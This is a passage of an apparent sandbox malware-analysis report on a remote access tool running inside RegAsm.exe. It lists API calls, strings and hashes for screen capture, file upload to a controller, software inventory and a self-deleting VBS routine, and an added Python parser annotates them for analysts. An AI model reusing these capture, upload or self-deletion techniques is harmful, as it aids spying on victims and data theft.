                                                                                              • Instruction Fuzzy Hash: 2E613B35E0060E9BDF08DFB9D4815EFB7B6FF8C310B10852AE816BB250D7746A498B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction ID: a6e552f00ab565f691ebadb1e40a45b636efe887c5fa14ffde51f1c265891404
                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction Fuzzy Hash: 74113677300071C396448A2FF4B82B7A78DEAC63207BC43F7D1438B758D12AE401952C
                                                                                              APIs
                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00411D54
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00411D60
                                                                                                • Part of subcall function 004121BD: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004121F1
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DCB
                                                                                              • DeleteDC.GDI32(004595D0), ref: 00411DE3
                                                                                              • DeleteDC.GDI32(00000000), ref: 00411DE6
                                                                                              • DeleteObject.GDI32(?), ref: 00411DEA
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00411E07
                                                                                              • DeleteDC.GDI32(004595D0), ref: 00411E1A
                                                                                              • DeleteDC.GDI32(00000000), ref: 00411E1D
                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,004595D0,00000000,00000000,?,?,00CC0020), ref: 00411E41
                                                                                              • GetIconInfo.USER32(?,?), ref: 00411E70
                                                                                              • DeleteObject.GDI32(?), ref: 00411E95
                                                                                              • DeleteObject.GDI32(?), ref: 00411E9E
                                                                                              • DrawIcon.USER32(?,00000000,00000000,?), ref: 00411EAD
                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00411ED8
                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 00411EFB
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000), ref: 00411F61
                                                                                              • GlobalAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 00411FCA
                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00411FEA
                                                                                              • DeleteDC.GDI32(004595D0), ref: 00411FFD
                                                                                              • DeleteDC.GDI32(00000000), ref: 00412000
                                                                                              • DeleteObject.GDI32(00000000), ref: 00412005
                                                                                              • GlobalFree.KERNEL32(?), ref: 0041200F
                                                                                              • DeleteObject.GDI32(00000000), ref: 004120B4
                                                                                              • GlobalFree.KERNEL32(?), ref: 004120BB
                                                                                              • DeleteDC.GDI32(004595D0), ref: 004120CA
                                                                                              • DeleteDC.GDI32(00000000), ref: 004120D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                              • String ID: DISPLAY
                                                                                              • API String ID: 479521175-865373369
                                                                                              • Opcode ID: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
                                                                                              • Instruction ID: a12fe5a06dbbbc465c5be36cf98e5f4f0fe68db3817599c41a0b734274edf732
                                                                                              • Opcode Fuzzy Hash: 34938ef5fb8ee993a3ac343ea20c53c6c248d3091d914891890047bb1913d3bd
                                                                                              • Instruction Fuzzy Hash: B6C16C75E00219AFDB14DFA4DC45BEEBBB9FF09304F00406AEA05E72A0DB74A945CB59
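The two "APIs" listings in this part of the report (the GDI routine whose call sites start at 00411D54, and the mciSendString routine starting at 004137E5) are the kind of thing an analyst reads by hand: CreateDCA("DISPLAY") followed by CreateCompatibleBitmap, StretchBlt/BitBlt and GetDIBits is a full-screen grab, GetIconInfo plus DrawIcon composites the mouse cursor onto that frame, and the MCI command strings (play, pause, resume, status, stop, close) drive playback of an audio file, not microphone capture. The following Python is an added example, not part of the Joe Sandbox report or of the Remcos sample: it parses these listing lines into structured calls and matches them against small capability signatures. The signature sets, the "ANSI/Unicode suffix" normalisation and the ATT&CK T1113 annotation are my own assumptions; the embedded sample lines are excerpted from the listings above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Excerpts of the two "APIs" listings from the disassembly records above
# (constructed sample input for this example; not the whole listings).
SCREENSHOT_APIS = """\
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00411D54
• CreateCompatibleDC.GDI32(00000000), ref: 00411D60
  • Part of subcall function 004121BD: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004121F1
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DCB
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,004595D0,00000000,00000000,?,?,00CC0020), ref: 00411E41
• GetIconInfo.USER32(?,?), ref: 00411E70
• DrawIcon.USER32(?,00000000,00000000,?), ref: 00411EAD
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00411ED8
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00411FEA
• DeleteDC.GDI32(00000000), ref: 00412000
• DeleteObject.GDI32(00000000), ref: 00412005
"""
AUDIO_APIS = """\
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004137E5
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004137F9
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00459594), ref: 0041381E
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00467C58,00000000), ref: 00413834
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00413875
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041388D
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004138A1
• SetEvent.KERNEL32 ref: 004138C2
• WaitForSingleObject.KERNEL32(000001F4), ref: 004138D3
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00413905
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041390F
"""

# One listing line: optional "Part of subcall function <addr>:" prefix, then
# Api.MODULE(args), ref: <call-site>; some lines (SetEvent) carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

@dataclass
class ApiCall:
    api: str         # name as imported, e.g. CreateDCA
    module: str      # DLL, e.g. GDI32
    args: List[str]  # arguments as the sandbox rendered them ("?" = unresolved)
    ref: str         # call-site address in the dump
    subcall: str     # address of the sub-function for indirect calls, else ""

def normalize(api: str) -> str:
    """Fold ANSI/Unicode variants (CreateDCA / CreateDCW -> CreateDC). Heuristic (assumption)."""
    return re.sub(r"[AW]$", "", api) if len(api) > 3 else api

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # blank or non-API line in the record
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["sub"] or ""))
    return calls

# Capability signatures (my assumption): every API in the first set must appear,
# plus at least one of the second set when it is non-empty.
SIGNATURES = {
    "screen capture via GDI (ATT&CK T1113)": (
        {"CreateDC", "CreateCompatibleDC", "CreateCompatibleBitmap", "GetDIBits"},
        {"BitBlt", "StretchBlt"},
    ),
    "mouse cursor composited onto the frame": ({"GetIconInfo", "DrawIcon"}, set()),
    "MCI audio control via mciSendString": ({"mciSendString"}, set()),
}

def match_capabilities(calls: List[ApiCall]) -> Dict[str, Set[str]]:
    seen = {normalize(c.api) for c in calls}
    hits = {}
    for name, (required, any_of) in SIGNATURES.items():
        if required <= seen and (not any_of or any_of & seen):
            hits[name] = required | (any_of & seen)
    return hits

def captures_primary_display(calls: List[ApiCall]) -> bool:
    """CreateDC("DISPLAY", ...) opens a DC for the whole primary display; that
    string argument separates a full-screen grab from an ordinary window DC."""
    return any(normalize(c.api) == "CreateDC" and c.args[:1] == ["DISPLAY"] for c in calls)

def mci_commands(calls: List[ApiCall]) -> List[str]:
    """First mciSendString argument is the MCI command string; skip calls where
    the sandbox only resolved a numeric/unknown value. The verbs show playback control."""
    return [c.args[0] for c in calls
            if normalize(c.api) == "mciSendString" and c.args
            and not re.fullmatch(r"[0-9A-F?]+", c.args[0])]
```

Run against the two excerpts, the screenshot routine matches both the screen-capture and cursor-overlay signatures and targets "DISPLAY"; the audio routine yields the six MCI verbs, which is why it is labelled playback control here rather than audio capture.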
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004137E5
                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004137F9
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00459594), ref: 0041381E
                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00467C58,00000000), ref: 00413834
                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00413875
                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041388D
                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004138A1
                                                                                              • SetEvent.KERNEL32 ref: 004138C2
                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 004138D3
                                                                                              • CloseHandle.KERNEL32 ref: 004138E3
                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00413905
                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041390F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                              • API String ID: 738084811-1354618412
                                                                                              • Opcode ID: d67d27fa0060385a4794320c5855a58ac25f5aec50818c958c2f69414fa05d2e
                                                                                              • Instruction ID: 7cc83dd66f58b781604f24274fbcbce06d703a4d5cc541ca1a03aa14c20c1d7d
                                                                                              • Opcode Fuzzy Hash: d67d27fa0060385a4794320c5855a58ac25f5aec50818c958c2f69414fa05d2e
                                                                                              • Instruction Fuzzy Hash: 5451D4B1A00108BFD705BB75DC96DBF3B6C9E41349B10413FF502A61D2EE785E49866E
                                                                                              APIs
                                                                                                • Part of subcall function 0040D18B: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                                • Part of subcall function 0040D18B: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                                • Part of subcall function 0040D18B: RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000,00000000,00000001), ref: 00408B30
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408B43
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000,00000000,00000001), ref: 00408B5F
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000,00000000,00000001), ref: 00408B8D
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408DB0
                                                                                              • ExitProcess.KERNEL32 ref: 00408DBC
                                                                                                • Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValuechar_traits
                                                                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                              • API String ID: 1918141659-2254097358
                                                                                              • Opcode ID: e5aedc4af4ec909da9e307105bef19887c62757110c28acaf90147901663c20f
                                                                                              • Instruction ID: d6e31582f6bbeec3731eba5083e5c30d2f4351ed3cef2ab9d9d1dbed254d7763
                                                                                              • Opcode Fuzzy Hash: e5aedc4af4ec909da9e307105bef19887c62757110c28acaf90147901663c20f
                                                                                              • Instruction Fuzzy Hash: 5A712B31A01208ABDB09EB61E9529EE7769AF50309B64407FB506771D2EF7C2E0EC65C
                                                                                              APIs
                                                                                                • Part of subcall function 0040D18B: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                                • Part of subcall function 0040D18B: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                                • Part of subcall function 0040D18B: RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.1.3 Light), ref: 00408880
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408893
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.1.3 Light), ref: 004088C5
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00467F30,5.1.3 Light), ref: 004088D3
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408ACA
                                                                                              • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseDeleteExecuteExitModuleNameOpenProcessQueryShellValue
                                                                                              • String ID: ")$.vbs$5.1.3 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                              • API String ID: 1304132890-2661848401
                                                                                              • Opcode ID: c915d3d3cfd881888a9ba69b257a78b34908092fd65a9381916eff65d2380aa0
                                                                                              • Instruction ID: 4fffedc016be02ce2a268c02f2e0af6a6fdf237cd8678fb7a226089863e9ddbc
                                                                                              • Opcode Fuzzy Hash: c915d3d3cfd881888a9ba69b257a78b34908092fd65a9381916eff65d2380aa0
                                                                                              • Instruction Fuzzy Hash: B9613C31E00208ABCB09FB61E9529EE7769AF51305B64407FB506771D2EE7C2E0AC65C
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                              • String ID:
                                                                                              • API String ID: 3899193279-0
                                                                                              • Opcode ID: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
                                                                                              • Instruction ID: 4237e6e7e157a4c7dbb0d807abf8b9af0d4306fdc3138cecd09bc7ccf606b428
                                                                                              • Opcode Fuzzy Hash: 5a4c9786a0e6c4ce3e0c5a8e1a8ac3e6acba5de4b7bde96ade588f2d5d151125
                                                                                              • Instruction Fuzzy Hash: BBD12AB1D047006FEB20AF758851B6F7BA4EF05354F0502AFF9599B3A1EB399880875D
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,00000000,?), ref: 004144D3
                                                                                              • lstrlenW.KERNEL32(?), ref: 004144FB
                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00414522
                                                                                              • GetLastError.KERNEL32 ref: 00414530
                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 004145A6
                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 004145BF
                                                                                              • FindNextVolumeW.KERNEL32(00000018,?,00000104), ref: 004145D8
                                                                                              • FindVolumeClose.KERNEL32(00000018), ref: 00414618
                                                                                              • GetLastError.KERNEL32 ref: 0041462C
                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000105,00000105), ref: 0041465E
                                                                                              • lstrcatW.KERNEL32(?,?), ref: 00414676
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 00414684
                                                                                              • GetLastError.KERNEL32 ref: 0041468C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                                                                              • String ID: ?
                                                                                              • API String ID: 1756451316-1684325040
                                                                                              • Opcode ID: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
                                                                                              • Instruction ID: eb6b54062e2b08fb9c29ba80cfda5f6662be00940462f6bf9b60ec097b87ddd8
                                                                                              • Opcode Fuzzy Hash: 012ca2d5f34ff86deedc8a3fc7efefe5d6c6a887b5b73249fa18f6d9aaa2cbfb
                                                                                              • Instruction Fuzzy Hash: C051A375E00219ABCF209FA4DD48AEEB778FF99708F1044A6E509D3250E7788AC5CF59
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0044351B
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442730
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442742
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442754
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442766
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442778
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 0044278A
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 0044279C
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427AE
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427C0
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427D2
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427E4
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 004427F6
                                                                                                • Part of subcall function 00442713: _free.LIBCMT ref: 00442808
                                                                                              • _free.LIBCMT ref: 00443510
                                                                                                • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                                                                                • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                                                                              • _free.LIBCMT ref: 00443532
                                                                                              • _free.LIBCMT ref: 00443547
                                                                                              • _free.LIBCMT ref: 00443552
                                                                                              • _free.LIBCMT ref: 00443574
                                                                                              • _free.LIBCMT ref: 00443587
                                                                                              • _free.LIBCMT ref: 00443595
                                                                                              • _free.LIBCMT ref: 004435A0
                                                                                              • _free.LIBCMT ref: 004435D8
                                                                                              • _free.LIBCMT ref: 004435DF
                                                                                              • _free.LIBCMT ref: 004435FC
                                                                                              • _free.LIBCMT ref: 00443614
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID: pAF
                                                                                              • API String ID: 161543041-3714919331
                                                                                              • Opcode ID: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
                                                                                              • Instruction ID: 1e1acce580e4c44e89d7ce72c9cd794b27c1c651c1375113bcda4de26fb62da5
                                                                                              • Opcode Fuzzy Hash: 9dff2ffab6654004cd2e04035b17b0786675d8b5964ad36dccd12c0adc3be625
                                                                                              • Instruction Fuzzy Hash: 45316B71A04201AFFB20AE3AD846B97B7E8EF04715F14541FF568D6251DB39AE408B58
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E7CF
                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040E815
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E82F
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 0040E83A
                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E877
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040E889
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E894
                                                                                              • GetProcAddress.KERNEL32(00000000,0045EF50), ref: 0040E8A3
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040E8BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                              • API String ID: 2490988753-744132762
                                                                                              • Opcode ID: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
                                                                                              • Instruction ID: e2fe4f89bec593c1194b96244b36457e88d8aa3fc30695666a9ebb8fa0cbd204
                                                                                              • Opcode Fuzzy Hash: 12bfce5fc646e2fd3f8068a6a13d904aec02d3c927a8f3fc71f4415123d0c621
                                                                                              • Instruction Fuzzy Hash: 6531D6B3D01218A7DB20AB62DC48A8F77ACAB05704F0049B7EC08B3241D7789E558BEC
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID: pAF
                                                                                              • API String ID: 269201875-3714919331
                                                                                              • Opcode ID: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
                                                                                              • Instruction ID: 220afc4046d47a9c2269d4dee30ff000570bd1da0518462f48b073040ae84213
                                                                                              • Opcode Fuzzy Hash: eef7a25e70315998c590ce620b5ff32a8672605f39a8e77196fbde2380f9c6c1
                                                                                              • Instruction Fuzzy Hash: C7C13575D40604BFEB20DFA9CD42FEE77F8AB08744F54415AFA04FB282D6B4994187A4

APIs
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
• Instruction ID: 233e507832ae68596296c544fe1e2f99e94559176b76bcc42a010ae489b1e6e1
• Opcode Fuzzy Hash: b51cadc1cbb71c0b919ea5ea847b128ee4f0535acd3f89784f6d3715c31059ac
• Instruction Fuzzy Hash: FFB18F71900205AFDB11DF69C881BEEBBF5FF0C308F14506EEA59A7342D77998458BA8

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00406180 (dwDesiredAccess 0x80000000 = GENERIC_READ, dwShareMode 0x1 = FILE_SHARE_READ, dwCreationDisposition 0x3 = OPEN_EXISTING: an existing file is opened read-only)
• GetFileSizeEx.KERNEL32(00000000,?), ref: 004061B6
• __aulldiv.LIBCMT ref: 004061E0
  • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
  • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004062E6
• ReadFile.KERNEL32(?,00000000,000186A0,?,00000000), ref: 00406301 (nNumberOfBytesToRead 0x186A0 = 100000 bytes per read; together with the send() subcall and the "Uploading file to Controller:" string below, this is the file-upload routine that streams a local file to the C2 in 100000-byte chunks)
• CloseHandle.KERNEL32(?), ref: 004063C4
• CloseHandle.KERNEL32(?,00000052), ref: 00406400
• CloseHandle.KERNEL32(?), ref: 0040644F
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $X|F
• API String ID: 3086580692-2448825271
• Opcode ID: 5176fbe0382892210aab2832f7f4a5d389b00c2f49130bdc7182920e901426ac
• Instruction ID: ce89fbc2bbcb9f21e0201713ae3f479a73954a728a6b624bb473e1a190b651a0
• Opcode Fuzzy Hash: 5176fbe0382892210aab2832f7f4a5d389b00c2f49130bdc7182920e901426ac
• Instruction Fuzzy Hash: 72B1CC31E00118ABCB08FBA5D9929EEB7B5AF44314F10812FF906762D1EF785E458B59

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00414A96 (hKey 0x80000002 = HKEY_LOCAL_MACHINE, samDesired 0x20019 = KEY_READ)
• RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414D4A (walks the per-program subkeys of the Uninstall key; with the DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation and UninstallString value names below, this is an installed-software inventory)
• RegCloseKey.ADVAPI32(?), ref: 00414D5E
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: 96ddb292e8695b7f36ce2576911f6231e0e3744c9051e2d6320e6382e22b49ad
• Instruction ID: c6cf66618c576b2a9970c100bb5541a486628a9123b9a16081024123d303fd20
• Opcode Fuzzy Hash: 96ddb292e8695b7f36ce2576911f6231e0e3744c9051e2d6320e6382e22b49ad
• Instruction Fuzzy Hash: B4815F719000189FDB19EB61DC52AEEB778AF54305F1041BFB50AB7192EF386F4ACA58

APIs
Memory Dump Source
